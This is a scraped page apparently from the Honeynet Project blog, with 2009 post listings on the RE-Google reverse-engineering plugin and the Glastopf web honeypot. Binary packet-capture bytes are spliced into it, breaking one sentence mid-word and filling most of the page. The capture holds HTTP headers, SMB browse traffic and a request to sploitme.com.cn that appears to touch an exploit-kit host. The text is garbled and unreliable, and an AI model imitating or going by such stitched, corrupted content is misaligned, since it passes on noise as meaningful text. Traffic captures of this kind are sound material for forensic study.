
    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabil;=K}<<RT5'_E(@6G @r]P\h;BP]) DIE;=K'_RT5E@@r P];B\hPities expose a large attack surface that can be exploited to, among others, deface the web site, send spam, convert web site into bots, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to setup and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google of Summer Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    Syndicate content
    ;=K<<RT5'_E(@6D @r]P\hCPT DIEGE;=Kt;;'_RT5E-@9@r P]C\hP 0 ;=KW<<RT5'_E(@6C @r]P\hCPT FHEPF;=K66'_RT5E(@=@r P]C\hPO;=Ks66'_RT5E(@<@r P]C\hPO;=K <<RT5'_E(@6B @r]P\hCPT;=K(>>RT5'_E0@QC J}Mf^P$0p{;=Kԕ ::'_RT5E,@AJ}Mf P^$0`e;=Kv <<RT5'_E(@QI J}Mf^P$0P;=K? RT5'_E@N J}Mf^P$0P?GET /__utm.gif?utmwv=4.6.5&utmn=1298421081&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=2068504592&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265310375.1265310467.7%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive ;=Kʠ 66'_RT5E(@DJ}Mf P^$0Pz;=Ko <<RT5'_E(@QF J}MfXP>A_P DIE;=K#pp'_RT5Eb@ J}Mf P^$0PGHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:06 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:45 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 ;=K0YY'_RT5EK@J}Mf P^<$0P=GIF89a,D;;=K3<<RT5'_E(@QD J}Mf^P$0_P DIE;=Kp66'_RT5E(@sH84 PZ{=ZPq;=KNs<<RT5'_E(@I 84ZPZ{=Pv;=K '_EP  `  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%00VA\MAILSLOT\BROWSE `WORKGROUPXj 8FD12EDD2DC1462;=KI >>RT5'_E0@6/ @r_P֓p\;=K'O::'_RT5E,@2@r P_F֔`;=KU <<RT5'_E(@Q? 
J}Mf^P$0_Py;=K ::'_RT5E,@1@r P_F֔`;=K7VV'=UEH6DC4k-Z'=UcSc5t='=U 8fd12edd2dc1462<MSFT 5.07 ,./!+;=KNN'=URT5E@@Z  CD,`-Z  '=UcSc5  3Q6 ;=Ktpp'=UEb5DCN'-Z'=UcSc5='=U2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;=KNN'=URT5E@@Z  CD,Q-Z   '=UcSc5  3Q6 ;=K%'<<'=U'=U  ;=KS<<'=U'=U  -Z;=K![<<'=U'=U  -Z;=Knn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=K<<^'=UF(2 ";=KRR'=URT5ED   F(2 ";=K) nn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=K h<<^'=UF(2 " DIEGE;=KXiRR'=URT5ED   F(2 ";=KM nn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=Ke<<'=U'=U  ;=K**'=URT5RT5 '=U ;=KZ>>RT5'=UE0@0 84oPEpp;=K::'=URT5E,@r84 PoE`R;=K<<RT5'=UE(@7 84oPEP;=K+RT5'=UE@ 84oPEPGET /fg/show.php HTTP/1.0 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept: */* Host: sploitme.com.cn Connection: Keep-Alive ;=K66'=URT5E(@r84 PoEP^;=Ki'=URT5E@m784 PoEP*HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:08:38 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Length: 3500 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html 404 Not Found

    Not Found

    The requested URL /fg/show.php was not found on this server.

    ;=K<<RT5'=UE(@4 84oPE"P:;=KDwnn'=UE`  Lg,g( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=Knn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=KEnn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=Kx nn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=Knn'=UE`  L)h( FHEPFCELEHFCEPFFFACACACACACACAAA   ;=K_nn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=Knn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=K|Xnn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=Krznn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=K nn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=K nn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=Knn'=UE`  Lg(i( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=KSnn'=UE`  L&j( FHEPFCELEHFCEPFFFACACACACACACABO   ;=K$'=UEJ  rk  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K)'=UE:  Cl  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U;=KL '=UEG  rn  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KR-'=UEF  ro  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K, '=UEE  rp  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462<=K9'=UE8  +q  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=K?'=UE7  +r  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=Kn'=UE6  +s  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=KS'=UE5  +t  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462